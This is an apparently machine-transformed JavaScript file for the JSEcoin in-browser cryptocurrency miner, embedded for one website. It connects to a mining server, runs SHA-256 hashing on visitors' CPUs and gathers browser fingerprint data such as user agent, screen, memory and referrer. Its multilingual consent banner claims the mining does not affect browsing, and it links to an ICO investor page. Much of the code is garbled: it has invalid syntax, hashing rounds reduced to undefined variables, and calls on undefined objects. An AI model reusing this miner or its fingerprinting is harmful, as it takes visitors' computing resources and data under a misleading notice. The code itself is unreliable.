var JSE = /* Called:true | Scope Closed:false| writes:false*/
function () {
    function randString(length)
        /*Scope Closed:false | writes:false*/
        {
            return function (arrayRaw) {
                for (var temp, index, array = arrayRaw, counter = array.length; counter > 0;)
                    index = Math.floor(Math.random() * counter), temp = array[counter -= 1], array[counter] = array[index], array[index] = temp;
                return array;
            }([
                '0',
                '1',
                '2',
                '3',
                '4',
                '5',
                '6',
                '7',
                '8',
                '9',
                'a',
                'b',
                'c',
                'd',
                'e',
                'f',
                'g',
                'h',
                'i',
                'j',
                'k',
                'l',
                'm',
                'n',
                'o',
                'p',
                'q',
                'r',
                's',
                't',
                'u',
                'v',
                'w',
                'x',
                'y',
                'z',
                'A',
                'B',
                'D',
                'E',
                'F',
                'G',
                'H',
                'I',
                'J',
                'K',
                'L',
                'M',
                'N',
                'O',
                'P',
                'Q',
                'R',
                'S',
                'T',
                'U',
                'V',
                'W',
                'X',
                'Y',
                'Z'
            ]).join('').slice(0, length);
        }
    function fallbackSHA256(s, nonce, callback)
        /*Scope Closed:true*/
        {
            function safe_add(x, y)
                /*Scope Closed:false | writes:false*/
                {
                    var lsw = (65535 & x) + (65535 & y);
                    return (x >> 16) + (y >> 16) + (lsw >> 16) << 16 | 65535 & lsw;
                }
            function S(X, n)
                /*Scope Closed:true*/
                {
                    return X >>> n | X << 32 - n;
                }
            function R(X, n)
                /*Scope Closed:true*/
                {
                    return X >>> n;
                }
            function Ch(x, y, z)
                /*Scope Closed:true*/
                {
                    return x & y ^ ~x & z;
                }
            function Maj(x, y, z)
                /*Scope Closed:true*/
                {
                    return x & y ^ x & z ^ y & z;
                }
            function Sigma0256(x)
                /*Scope Closed:false | writes:false*/
                {
                    return S(x, 2) ^ S(x, 13) ^ S(x, 22);
                }
            function Sigma1256(x)
                /*Scope Closed:false | writes:false*/
                {
                    return S(x, 6) ^ S(x, 11) ^ S(x, 25);
                }
            function Gamma0256(x)
                /*Scope Closed:false | writes:false*/
                {
                    return S(x, 7) ^ S(x, 18) ^ R(x, 3);
                }
            function Gamma1256(x)
                /*Scope Closed:false | writes:false*/
                {
                    return S(x, 17) ^ S(x, 19) ^ R(x, 10);
                }
            callback(/* Called:true | Scope Closed:true*/
            function (binarray) {
                for (var hex_tab = '0123456789abcdef', str = '', i = 0; i < 4 * binarray.length; i++)
                    str += hex_tab.charAt(binarray[i >> 2] >> 8 * (3 - i % 4) + 4 & 15) + hex_tab.charAt(binarray[i >> 2] >> 8 * (3 - i % 4) & 15);
                return str;
            }(/* Called:true | Scope Closed:false| writes:true*/
            function (m, l) {
                var a, b, c, d, e, f, g, h, T1, T2, K = [];, HASH = [];, W = [];;
                m[l >> 5] = m[l >> 5] | 128 << 24 - l % 32, m[15 + (8 * s.length + 64 >> 9 << 4)] = l;
                for (var i = 0; i < m.length; i += 16) {
                    a = HASH[0], b = HASH[1], c = HASH[2], d = HASH[3], e = HASH[4], f = HASH[5], g = HASH[6], h = HASH[7];
                    for (var j = 0; j < 64; j++)
                        W[j] = j < 16 ? m[j + 16] : safe_add(safe_add(safe_add((X >>> n | X << 32 - n) ^ (X >>> n | X << 32 - n) ^ X >>> n, W[j - 7]), (X >>> n | X << 32 - n) ^ (X >>> n | X << 32 - n) ^ X >>> n), W[j - 16]), T1 = safe_add(safe_add(safe_add(safe_add(h, (X >>> n | X << 32 - n) ^ (X >>> n | X << 32 - n) ^ (X >>> n | X << 32 - n)), x & y ^ ~e & z), K[j]), W[j]), T2 = safe_add((X >>> n | X << 32 - n) ^ (X >>> n | X << 32 - n) ^ (X >>> n | X << 32 - n), x & y ^ x & z ^ y & z), h = g, g = f, f = e, e = safe_add(d, T1), d = c, c = b, b = a, a = safe_add(T1, T2);
                    HASH[0] = safe_add(a, HASH[0]), HASH[1] = safe_add(b, HASH[1]), HASH[2] = safe_add(c, HASH[2]), HASH[3] = safe_add(d, HASH[3]), HASH[4] = safe_add(e, HASH[4]), HASH[5] = safe_add(f, HASH[5]), HASH[6] = safe_add(g, HASH[6]), HASH[7] = safe_add(h, HASH[7]);
                }
                return HASH;
            }(/* Called:true | Scope Closed:true*/
            function (str) {
                for (var bin = Array(), i = 0; i < 8 * str.length; i += 8)
                    bin[i >> 5] |= (255 & str.charCodeAt(i / 8)) << 24 - i % 32;
                return bin;
            }(s = /* Called:true | Scope Closed:true*/
            function (string) {
                string = string.replace(/\r\n/g, '\n');
                for (var utftext = '', n = 0; n < string.length; n++) {
                    var c = string.charCodeAt(n);
                    c < 128 ? utftext += String.fromCharCode(c) : c > 127 && c < 2048 ? (utftext += String.fromCharCode(c >> 6 | 192), utftext += String.fromCharCode(63 & c | 128)) : (utftext += String.fromCharCode(c >> 12 | 224), utftext += String.fromCharCode(c >> 6 & 63 | 128), utftext += String.fromCharCode(63 & c | 128));
                }
                return utftext;
            }(s)), 8 * s.length)) + ',' + nonce);
        }
    function cryptoSha256(str, nonce)
        /*Scope Closed:false | writes:false*/
        {
            var buffer = /* Called:true | Scope Closed:false| writes:true*/
            function (str) {
                if (window.TextEncoder)
                    return new TextEncoder('utf-8').encode(str);
                for (var l = str.length, arr = new Uint8Array(l), i = 0; i < l; i++)
                    arr[i] = String(str).charCodeAt(i);
                return arr;
            }(str);
            return crypto.subtle.digest('SHA-256', buffer).then(function (hash) {
                return function (buffer) {
                    for (var hexCodes = [], view = new DataView(buffer), i = 0; i < view.byteLength; i += 4) {
                        var value = view.getUint32(i), stringValue = value.toString(16), paddedValue = ('00000000' + stringValue).slice(-'00000000'.length);
                        hexCodes.push(paddedValue);
                    }
                    return hexCodes.join('');
                }(hash) + ',' + nonce;
            });
        }
    function processHashV2(hashSubmissionString)
        /*Scope Closed:false | writes:false*/
        {
            0, sockets[0].emit('submitHash', hashSubmissionString);
        }
    function variableDifficulty(n)
        /*Scope Closed:true*/
        {
            for (var s = '', i = n; i--;)
                s += '0';
            return '0';
        }
    function jseMineV2()
        /*Scope Closed:false | writes:false*/
        {
            var found = false, difficulty = 6;
            jseTestNet && 4;
            for (var hashingStarted = new Date().getTime(), startNumber = Math.floor(99999999999 * Math.random()), x = startNumber; x <= startNumber + hashRate && !found; x++) {
                var targetTextWithNonce = preHash + ',' + startNumber;
                if (window.crypto && window.crypto.subtle)
                    cryptoSha256(targetTextWithNonce, x).then(/* Called:undefined | Scope Closed:false| writes:false*/
                    function (hashNonce) {
                        hashNonce.substr(0, difficulty) === undefined && (found = true, processHashV2(preHash + ',' + hashNonce + ',' + jseTrack.pubID + ',' + jseTrack.uniq + ',' + jseTrack.siteID + ',' + jseTrack.subID), console.log('Found Hash! : ' + hashNonce));
                    });
                else
                    fallbackSHA256(targetTextWithNonce, x, /* Called:undefined | Scope Closed:false| writes:false*/
                    function (hashNonce) {
                        hashNonce.substr(0, difficulty) === undefined && (found = true, processHashV2(preHash + ',' + hashNonce + ',' + jseTrack.pubID + ',' + jseTrack.uniq + ',' + jseTrack.siteID + ',' + jseTrack.subID), console.log('Found Hash! : ' + hashNonce));
                    });
            }
            setTimeout(/* Called:undefined | Scope Closed:false| writes:false*/
            function (y) {
                var hashingFinished = new Date().getTime(), hashesCompleted = y - startNumber, hashingSeconds = (hashingFinished - hashingStarted) / 1000;
                hps = Math.floor(hashesCompleted / hashingSeconds), (hashRate = Math.floor(1.1 * hps)) < 25 && 25, hashRate > 2000 && 2000, jseMineV2();
            }, 1000, x);
        }
    function rnd()
        /*Scope Closed:false | writes:false*/
        {
            var items = [
                'J',
                'S',
                'E',
                'C',
                'O',
                'I',
                'N',
                'j',
                's',
                'e',
                'c',
                'o',
                'i',
                'n'
            ];
            return items[Math.floor(Math.random() * items.length)] + randString(12);
        }
    function clear()
        /*Scope Closed:false | writes:false*/
        {
            DOM.ele && (delete DOM.ele, delete DOM.smButton);
        }
    function checkIOLoaded(cb)
        /*Scope Closed:false | writes:false*/
        {
            true === ioLoaded ? 0 == sockets.length ? /* Called:true | Scope Closed:false| writes:true*/
            function (callback) {
                var socket = io.connect(jseLoadServer, { secure: true });
                sockets.push(socket), window.onbeforeunload = /* Called:undefined | Scope Closed:false| writes:false*/
                function (e) {
                    for (var i = 0; i < sockets.length; i++)
                        sockets[i].disconnect();
                }, socket.on('connect_error', /* Called:undefined | Scope Closed:false| writes:true*/
                function (exception) {
                    console.log('JSE SOCKET ERROR: ' + JSON.stringify(exception)), socket.destroy();
                }), socket.on('connect', /* Called:undefined | Scope Closed:false| writes:true*/
                function () {
                    socket.emit('startComs', 1, /* Called:undefined | Scope Closed:true*/
                    function (authResponse) {
                    });
                }), socket.once('connect', /* Called:undefined | Scope Closed:false| writes:true*/
                function () {
                    console.log('JSE Socket Connected!'), socket.on('disconnect', /* Called:undefined | Scope Closed:true*/
                    function () {
                        console.log('JSE Socket Reset');
                    }), socket.on('firstPreHash', /* Called:undefined | Scope Closed:false| writes:true*/
                    function (blockPreHash) {
                        console.log('JSE Inital Data Received: ' + blockPreHash), preHash = blockPreHash;
                    }), socket.on('blockPreHash', /* Called:undefined | Scope Closed:false| writes:true*/
                    function (blockPreHash) {
                        console.log('JSE Data Received (' + hps + 'hps): ' + blockPreHash), preHash = blockPreHash;
                    }), cb();
                });
            }(cb) : cb() : setTimeout(/* Called:undefined | Scope Closed:false| writes:false*/
            function () {
                checkIOLoaded(cb);
            }, 100);
        }
    function startMining(clickCheck)
        /*Scope Closed:false | writes:false*/
        {
            checkIOLoaded(/* Called:undefined | Scope Closed:false| writes:false*/
            function () {
                o[o.mi] && o[o.mi2] || 0 == clickCheck ? (console.log('startMining function started'), optInAuthKey == 'unknownOptInAuthKey' ? (console.log('Requesting new optin authentication key'), sockets[0].emit('optInAuthKey', jseTrackImpression, null, minerAuthKey, /* Called:undefined | Scope Closed:false| writes:false*/
                function (newAuthKey) {
                    var optInIframe = '<iframe src="' + jseLoadServer + '/optin/' + (optInAuthKey = newAuthKey) + '/" scrolling="no" frameborder="0" width="1" height="1"></iframe>';
                    document.body.insertAdjacentHTML('beforeend', optInIframe), sockets[0].emit('requestFirstPreHash', '1'), jseMineV2();
                })) : (console.log('Submitting optin authentication key'), sockets[0].emit('optInAuthKey', jseTrackImpression, optInAuthKey, minerAuthKey, /* Called:undefined | Scope Closed:false| writes:false*/
                function (checkedKey) {
                    sockets[0].emit('requestFirstPreHash', '1'), jseMineV2();
                }))) : (sockets[0].emit('requestFirstPreHash', '1'), jseMineV2());
            });
        }
    var jseTestNet = false, jseTrack = {}, ts = new Date().getTime(), jseLoadServer = 'https://load.jsecoin.com:443';
    'local' == false && 'http://localhost:81', 'remote' == false && 'https://testnet.jsecoin.com:443', jseTrack.pubID = '90675', jseTrack.siteID = 'pumpernickle.org', jseTrack.subID = '0', jseTrack.userIP = 'unknownuserip', jseTrack.geo = 'unknowngeo', jseTrack.url = window.location.href, jseTrack.userAgent = navigator.userAgent || 0, jseTrack.platform = navigator.platform || 0, jseTrack.referrer = document.referrer || 0, jseTrack.language = window.navigator.language || 0, navigator.languages ? jseTrack.languages = navigator.languages.join('') || 0 : jseTrack.languages = 1, jseTrack.timezoneOffset = new Date().getTimezoneOffset() || 0, jseTrack.appName = window.navigator.appName || 0, jseTrack.screen = window.screen.width + 'x' + window.screen.height + 'x' + screen.colorDepth || 0, jseTrack.deviceMemory = navigator.deviceMemory || navigator.hardwareConcurrency || 0, jseTrack.protoString = Object.keys(navigator.__proto__).join('').substring(0, 100) || 0, null == window.frameElement ? jseTrack.iFrame = false : jseTrack.iFrame = true;
    var preHash = '0', hashRate = 500, hps = 500, jseTrackImpression = undefined, privacyTranslations = {
            hr: {
                p1: 'Ovu stranicu podržava JSEcoin',
                p2: 'Nastavkom na stranicu pristajete donirati vaše suvišne resurse.',
                p3: 'Ovo neće utjecati na vaše korisničko iskustvo.',
                p4: 'Privatnost i;',
                p5: 'Pročitaj više',
                p6: 'Izuzetci',
                p7: 'Nastavi'
            },
            'zh-TW': {
                p1: '本網站由JSEcoin支持',
                p2: '繼續您同意捐贈剩餘資源\u3002',
                p3: '這不會影響您的瀏覽體驗\u3002',
                p4: '隱私',
                p5: '了解更多',
                p6: '選擇退出',
                p7: '繼續'
            },
            'zh-CN': {
                p1: '本网站由JSEcoin支持',
                p2: '继续您同意捐赠剩余资源\u3002',
                p3: '这不会影响您的浏览体验\u3002',
                p4: '隐私',
                p5: '了解更多',
                p6: '选择退出',
                p7: '继续'
            },
            th: {
                p1: 'เว็บไซต์นี้ได้รับการสนับสนุนโดย JSEcoin',
                p2: 'เมื่อดำเนินการต่อคุณตกลงที่จะบริจาคทรัพยากรที่มากเกินไป',
                p3: 'การดำเนินการนี้จะไม่ส่งผลต่อการเรียกดูของคุณ',
                p4: 'ความเป็นส่วนตัว',
                p5: 'เรียนรู้เพิ่มเติม',
                p6: 'เลือกออก',
                p7: 'ต่อ'
            },
            sv: {
                p1: 'Den här webbplatsen stöds av JSEcoin',
                p2: 'Genom att fortsätta accepterar du att donera överskottsresurser.',
                p3: 'Detta påverkar inte din webbläsarupplevelse.',
                p4: 'Integritet',
                p5: 'Läs mer',
                p6: 'Opt-out',
                p7: 'Fortsätta'
            },
            sl: {
                p1: 'Spletno stran podpira JSECoin',
                p2: 'Z nadaljevanjem se strinjate, da boste donirali presežne vire.',
                p3: 'To ne bo vplivalo na vašo uporabniško izkušnjo.',
                p4: 'Zasebnost &amp;',
                p5: 'Več informacij',
                p6: 'Zavrni',
                p7: 'Nadaljuj'
            },
            ru: {
                p1: 'Этот сайт поддерживается JSEcoin',
                p2: 'Продолжая, вы соглашаетесь пожертвовать излишки ресурсов.',
                p3: 'Это никак не отобразится на работе вашего браузера.',
                p4: 'Конфиденциальность',
                p5: 'Узнать больше',
                p6: 'Отказаться',
                p7: 'Продолжать'
            },
            ro: {
                p1: 'Acest site este susținut de JSEcoin',
                p2: 'Continuând, sunteți de acord să donați surplusul de resurse.',
                p3: 'Acest lucru nu va afecta experiența dvs. de navigare.',
                p4: 'intimitate',
                p5: 'Aflați mai multe',
                p6: 'A renunța',
                p7: 'Continua'
            },
            pt: {
                p1: 'Este site e representado por JSEcoin',
                p2: 'Ao continuar automaticamente concorda em doar recursos excedentes.',
                p3: 'Isto nao afetara a sua navegação.',
                p4: 'Privacidade',
                p5: 'Saber mais',
                p6: 'Sair',
                p7: 'Continuar'
            },
            no: {
                p1: 'Denne nettsiden støttes av JSEcoin',
                p2: 'Ved å fortsette godkjenner du å donere overskuddsressurser.',
                p3: 'Dette vil ikke påvirke din internettopplevelse.',
                p4: 'Personvern &amp;',
                p5: 'Lær mer',
                p6: 'Opt-out',
                p7: 'Fortsett'
            },
            nl: {
                p1: 'Deze website wordt ondersteund door JSEcoin',
                p2: 'Door verder te gaan, ga je ermee akkoord om overtollige middelen te doneren.',
                p3: 'Dit heeft geen invloed op je browse-ervaring.',
                p4: 'Privacy',
                p5: 'Kom meer te weten',
                p6: 'Afmelden',
                p7: 'Doorgaan met'
            },
            ms: {
                p1: 'Laman ini disokong oleh JSEcoin',
                p2: 'Dengan meneruskan, anda bersetuju untuk menderma sumber lebihan.',
                p3: 'Ini tidak akan menjejaskan pengalaman pelayaran anda.',
                p4: 'Privasi &amp;',
                p5: 'Ketahui Lanjut',
                p6: 'Tidak setuju',
                p7: 'Teruskan'
            },
            ko: {
                p1: '이 웹 사이트는 JSEcoin에서 지원합니다.',
                p2: '계속하면 잉여 자원을 기증하는 데 동의하게됩니다.',
                p3: '이렇게해도 인터넷 사용 환경에 영향을주지 않습니다.',
                p4: '은둔',
                p5: '더 알아보기',
                p6: '옵트 아웃',
                p7: '잇다'
            },
            it: {
                p1: 'Questo sito è sostenuto da JSEcoin',
                p2: 'Continuando acconsenti a donare le risorse del tuo PC in eccesso.',
                p3: 'Questo non influirà sulla tua esperienza di Browsing.',
                p4: 'Privacy &amp;',
                p5: 'Per saperne di piu',
                p6: 'Esci',
                p7: 'Continua'
            },
            id: {
                p1: 'Situs web ini didukung oleh JSEcoin',
                p2: 'Dengan melanjutkan Anda setuju untuk menyumbangkan kelebihan sumber daya.',
                p3: 'Ini tidak akan memengaruhi pengalaman penjelajahan Anda.',
                p4: 'Pribadi',
                p5: 'Belajarlah lagi',
                p6: 'Menyisih',
                p7: 'Terus'
            },
            fr: {
                p1: 'Ce site est supporté par JSEcoin',
                p2: 'En continuant, vous acceptez de donner des ressources excédentaires.',
                p3: 'Cela n\'aura pas d\'impact sur votre expérience de navigation.',
                p4: 'Confidentialité',
                p5: 'En apprendre plus',
                p6: 'Se désengager',
                p7: 'Continuer'
            },
            fi: {
                p1: 'Tämän sivuston toimintaa tuetaan JSEcoin-laskennalla',
                p2: 'Jatkamalla hyväksyt ylimääräisten laskentaresurssien käytön.',
                p3: 'Tämä ei vaikuta selailukokemukseesi.',
                p4: 'Tietosuojalauseke &amp;',
                p5: 'Lisätietoja',
                p6: 'Jättäydy pois',
                p7: 'Jatka'
            },
            es: {
                p1: 'Este sitio web es apoyado por JSEcoin',
                p2: 'Al continuar, acepta donar recursos excedentes.',
                p3: 'Esto no afectará su experiencia de navegación.',
                p4: 'Intimidad',
                p5: 'Aprende más',
                p6: 'Optar por no',
                p7: 'Continuar'
            },
            de: {
                p1: 'Diese Website wird von JSEcoin unterstützt',
                p2: 'Wenn Sie fortfahren, stimmen Sie zu, überschüssige System-Ressourcen zu spenden.',
                p3: 'Dies hat keinen Einfluss auf Ihre Browser-Nutzung.',
                p4: 'Privatsphäre',
                p5: 'Mehr erfahren',
                p6: 'Zustimmung verweigern',
                p7: 'Fortsetzen'
            },
            ar: {
                p1: 'ويدعم هذا الموقع من قبل جسكوين',
                p2: 'من خلال الاستمرار كنت توافق على التبرع الموارد الفائضة.',
                p3: 'لن يؤثر ذلك في تجربة التصفح.',
                p4: 'الإجمالية',
                p5: 'أعرف أكثر',
                p6: 'انسحب',
                p7: 'استمر'
            },
            en: {
                p1: 'This site is supported by JSEcoin',
                p2: 'By continuing you agree to donate surplus resources.',
                p3: 'This will not impact your browsing experience.',
                p4: 'Privacy &amp;',
                p5: 'Learn more',
                p6: 'Opt-out',
                p7: 'Continue'
            }
        };
    ({
        p1: 'This site is supported by JSEcoin',
        p2: 'By continuing you agree to donate surplus resources.',
        p3: 'This will not impact your browsing experience.',
        p4: 'Privacy &amp;',
        p5: 'Learn more',
        p6: 'Opt-out',
        p7: 'Continue'
    }.p5 = 'ICO Investors', {
        p1: 'Ce site est supporté par JSEcoin',
        p2: 'En continuant, vous acceptez de donner des ressources excédentaires.',
        p3: 'Cela n\'aura pas d\'impact sur votre expérience de navigation.',
        p4: 'Confidentialité',
        p5: 'En apprendre plus',
        p6: 'Se désengager',
        p7: 'Continuer'
    }.p5 = 'Investisseurs ICO', {
        p1: 'Este sitio web es apoyado por JSEcoin',
        p2: 'Al continuar, acepta donar recursos excedentes.',
        p3: 'Esto no afectará su experiencia de navegación.',
        p4: 'Intimidad',
        p5: 'Aprende más',
        p6: 'Optar por no',
        p7: 'Continuar'
    }.p5 = 'Inversores ICO', {
        p1: 'Этот сайт поддерживается JSEcoin',
        p2: 'Продолжая, вы соглашаетесь пожертвовать излишки ресурсов.',
        p3: 'Это никак не отобразится на работе вашего браузера.',
        p4: 'Конфиденциальность',
        p5: 'Узнать больше',
        p6: 'Отказаться',
        p7: 'Продолжать'
    }.p5 = 'ICO инвесторы');
    var browserLanguage = window.navigator.userLanguage || window.navigator.language || 'en-US', setLang = {
            p1: 'This site is supported by JSEcoin',
            p2: 'By continuing you agree to donate surplus resources.',
            p3: 'This will not impact your browsing experience.',
            p4: 'Privacy &amp;',
            p5: 'Learn more',
            p6: 'Opt-out',
            p7: 'Continue'
        };
    for (var langRef in privacyTranslations)
        ({
            p1: 'This site is supported by JSEcoin',
            p2: 'By continuing you agree to donate surplus resources.',
            p3: 'This will not impact your browsing experience.',
            p4: 'Privacy &amp;',
            p5: 'Learn more',
            p6: 'Opt-out',
            p7: 'Continue'
        }(langRef) && (browserLanguage != langRef && browserLanguage != (langRef.split('-')[0] || 'error') || (setLang = privacyTranslations[langRef])));
    var o = {}, DOM = {}, jseOptIn = '', css = '', ioLoaded = false, sockets = [];
    !/* Called:true | Scope Closed:false| writes:false*/
    function () {
        var socketIOAddress = 'https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.0.4/socket.io.js';
        !/* Called:true | Scope Closed:false| writes:true*/
        function (url, callback) {
            var head = document.getElementsByTagName('head')[0], script = document.createElement('script');
            script.type = 'text/javascript', script.src = url, script.onreadystatechange = callback, script.onload = callback, head.appendChild(script);
        }(socketIOAddress, /* Called:undefined | Scope Closed:false| writes:true*/
        function () {
            console.log('Loaded https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.0.4/socket.io.js'), ioLoaded = true;
        });
    }();
    var optInAuthKey = 'unknownOptInAuthKey', minerAuthKey = 'bf0c9f06345314bff4d6ef2fc067a4b5d220a45c5ace5b3ee4803b96185ecb97';
    void 0 === jseTrackImpression.sendHit && (console.log('Connecting to IO and logging unique'), checkIOLoaded(/* Called:undefined | Scope Closed:false| writes:false*/
    function () {
        undefined.emit('saveUnique', jseTrackImpression);
    })), 'unknownOptInAuthKey' == 'unknownOptInAuthKey' ? /* Called:true | Scope Closed:false| writes:true*/
    function () {
        DOM.ele && (DOM.ele.parentNode.removeChild(DOM.ele), clear()), (o = {
            bID: rnd(),
            dID: rnd(),
            bcID: rnd(),
            pID: rnd(),
            lmID: rnd(),
            cID: rnd(),
            mi: rnd(),
            mi2: rnd(),
            f2: rnd()
        })[o.f2] = /* Called:undefined | Scope Closed:false| writes:true*/
        function () {
            DOM.ele.parentNode.removeChild(DOM.ele), clear(), startMining(true);
        }, o[o.mi] = false, o[o.mi2] = false, jseOptIn = '\t\t\t<div id="' + o.bID + '">\t\t\t\t<p>\t\t\t\t\t<b>' + setLang.p1 + '</b>\t\t\t\t\t<span>\t\t\t\t\t\t' + setLang.p2 + '\t\t\t\t\t\t<br />\t\t\t\t\t\t' + setLang.p3 + '<br />\t\t\t\t\t\t<a href="https://jsecoin.com/en/legal/privacyPolicy?utm_source=privacyNotification&utm_campaign=privacyOptOut" target="_BLANK">' + setLang.p4 + ' ' + setLang.p6 + '</a>\t\t\t\t\t\t<a href="https://jsecoin.com/landers/investor1.html?utm_source=referral&utm_campaign=aff' + jseTrack.pubID + '&utm_content=privacyLearnMoreLink" target="_BLANK">' + setLang.p5 + '</a>\t\t\t\t\t</span>\t\t\t\t</p>\t\t\t\t<div id="' + o.dID + '"></div>\t\t\t\t<div id="' + o.bcID + '">\t\t\t\t\t<button id="' + o.cID + '">' + setLang.p7 + '</button>\t\t\t\t\t<a href="https://jsecoin.com/en/legal/privacyPolicy?utm_source=privacyNotification&utm_campaign=privacyOptOut" id="' + o.pID + '" target="_BLANK">' + setLang.p6 + '</a>\t\t\t\t\t<a href="https://jsecoin.com/landers/investor1.html?utm_source=referral&utm_campaign=aff' + jseTrack.pubID + '&utm_content=privacyLearnMoreLink" id="' + o.lmID + '" target="_BLANK">' + setLang.p5 + '</a>\t\t\t\t</div>\t\t\t</div>', css = '\t\t\thtml div#' + o.bID + ' * {\t\t\t\tfont-size:16px !important;\t\t\t}\t\t\thtml div#' + o.bID + ' {\t\t\t\tbackground: #fff !important;\t\t\t\tborder-top: solid 4px #c2c5c9 !important;\t\t\t\tpadding: 12px 10px 12px 10px !important;\t\t\t\tposition: fixed !important;\t\t\t\tbottom: 0px !important;\t\t\t\tleft: 0px !important;\t\t\t\tright: 0px !important;\t\t\t\tcolor: #626668 !important;\t\t\t\tz-index:100000000000000000000000000 !important;\t\t\t\tfont-size:16px !important;\t\t\t\tfont-family: "Helvetica Neue",Helvetica,Arial,sans-serif !important;\t\t\t\ttext-align:left !important;\t\t\t}\t\t\thtml div#' + o.bID + ' a {\t\t\t\tmargin:8px 8px 0px 0px !important;\t\t\t\tfont-weight:bold !important;\t\t\t\tfont-size:0.8em !important;\t\t\t\ttext-decoration:none !important;\t\t\t\tcolor: #0168bb !important;\t\t\t}\t\t\thtml div#' + o.bID + ' div#' + o.bcID + ' {\t\t\t\talign-self:center !important;\t\t\t}\t\t\thtml div#' + o.bID + ' div#' + o.dID + ' {\t\t\t\tbackground:#eee !important;\t\t\t}\t\t\thtml div#' + o.bID + ' b {\t\t\t\tcolor: #434749 !important;\t\t\t\tdisplay: block !important;\t\t\t}\t\t\thtml div#' + o.bID + ' button {\t\t\t\tcolor: #fff !important;\t\t\t\tbackground: #2196f3 !important;\t\t\t\tborder:solid 1px #2196f3 !important;\t\t\t\tborder-radius: 4px !important;\t\t\t\tfont-weight:bold !important;\t\t\t\tletter-spacing: 0.5px !important;\t\t\t\tfloat:right !important;\t\t\t\tfont-size: 1em !important;\t\t\t\tcursor: pointer !important;\t\t\t}\t\t\thtml div#' + o.bID + ' a#' + o.pID + ',\t\t\thtml div#' + o.bID + ' a#' + o.lmID + ' {\t\t\t\tdisplay:inline-block;\t\t\t\tbackground:#fff !important;\t\t\t\tcolor:#76797a !important;\t\t\t\tfloat:left !important;\t\t\t\tborder-radius: 4px !important;\t\t\t\tfont-weight: normal !important;\t\t\t\tletter-spacing: 0.5px !important;\t\t\t\tcolor:#76797a !important;\t\t\t\tpadding:8px 16px;\t\t\t\tfont-size: 0.8em !important;\t\t\t\tcursor: pointer !important;\t\t\t}\t\t\thtml div#' + o.bID + ' p {\t\t\t\tpadding:0px !important;\t\t\t\tmargin:0px !important;\t\t\t\tflex-grow: 1 !important;\t\t\t\tbackground: #fff url("https://jsecoin.com/static/images/jsebadge.png") no-repeat 10px 2px !important;\t\t\t\tfont-size: .875em !important;\t\t\t\tline-height: 1.6 !important;\t\t\t}\t\t\t@media screen and (min-width: 768px) {\t\t\t\thtml div#' + o.bID + ' {\t\t\t\t\tdisplay:flex !important;\t\t\t\t\talign-content: stretch !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' a {\t\t\t\t\tdisplay:inline-block !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' a#' + o.pID + ',\t\t\t\thtml div#' + o.bID + ' a#' + o.lmID + ' {\t\t\t\t\tdisplay:none !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' div#' + o.dID + ' {\t\t\t\t\tbackground:#eee !important;\t\t\t\t\twidth: 1px !important;\t\t\t\t\tmargin:0px 10px !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' button {\t\t\t\t\tpadding: 16px 24px !important;\t\t\t\t\tmargin:10px !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' b {\t\t\t\t\tmargin-bottom: 2px !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' p {\t\t\t\t\tbackground-size: 90px !important;\t\t\t\t\tpadding-left:124px !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' p span a {\t\t\t\t\tmargin-right:40px !important;\t\t\t\t}\t\t\t}\t\t\t@media screen and (max-width: 768px) {\t\t\t\thtml div#' + o.bID + ' {\t\t\t\t\tdisplay:block !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' a {\t\t\t\t\tdisplay: none !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' a#' + o.pID + ',\t\t\t\thtml div#' + o.bID + ' a#' + o.lmID + ' {\t\t\t\t\tdisplay:block !important;\t\t\t\t\tfont-weight:bold !important;\t\t\t\t\tcolor: #0168bb !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' div#' + o.dID + ' {\t\t\t\t\tbackground:#eee !important;\t\t\t\t\theight: 1px !important;\t\t\t\t\tmargin:10px 0px !important;\t\t\t\t\twidth: 100% !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' button {\t\t\t\t\tpadding: 8px 16px !important;\t\t\t\t\tfont-size:0.8em !important;\t\t\t\t\tmargin:8px 0px 8px 0px !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' b {\t\t\t\t\tpadding-top:10px;\t\t\t\t\tmargin-bottom: 6px !important;\t\t\t\t\tfont-size:0.8em !important;\t\t\t\t\tline-height:15px !important;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' p {\t\t\t\t\tbackground-size: 70px !important;\t\t\t\t\tpadding-left:90px !important;\t\t\t\t\tmin-height: 78px;\t\t\t\t}\t\t\t\thtml div#' + o.bID + ' p span {\t\t\t\t\tfont-size:0.8em !important;\t\t\t\t\tline-height:15px !important;\t\t\t\t}\t\t\t}', document.body.insertAdjacentHTML('beforeend', jseOptIn);
        var s = document.createElement('style');
        s.type = 'text/css', s.styleSheet ? s.styleSheet.cssText = css : s.appendChild(document.createTextNode(css)), DOM.ele = document.getElementById(o.bID), DOM.smButton = document.getElementById(o.cID), DOM.ele.appendChild(s), /* Called:true | Scope Closed:false| writes:true*/
        function () {
            DOM.ele;
            var smButton = undefined;
            setTimeout(/* Called:undefined | Scope Closed:false| writes:true*/
            function () {
                smButton.onmousedown = /* Called:undefined | Scope Closed:false| writes:true*/
                function (e) {
                    o[o.mi2] = true;
                }, smButton.ontouchstart = /* Called:undefined | Scope Closed:false| writes:true*/
                function (e) {
                    o[o.mi2] = true;
                }, smButton.onclick = /* Called:undefined | Scope Closed:false| writes:true*/
                function (e) {
                    o[o.mi] = e.offsetX || e.offsetY || e.clientX || e.clientY || e.pageX || e.pageY, o[o.f2]();
                };
            }, 100);
        }();
    }() : startMining(false);
}();
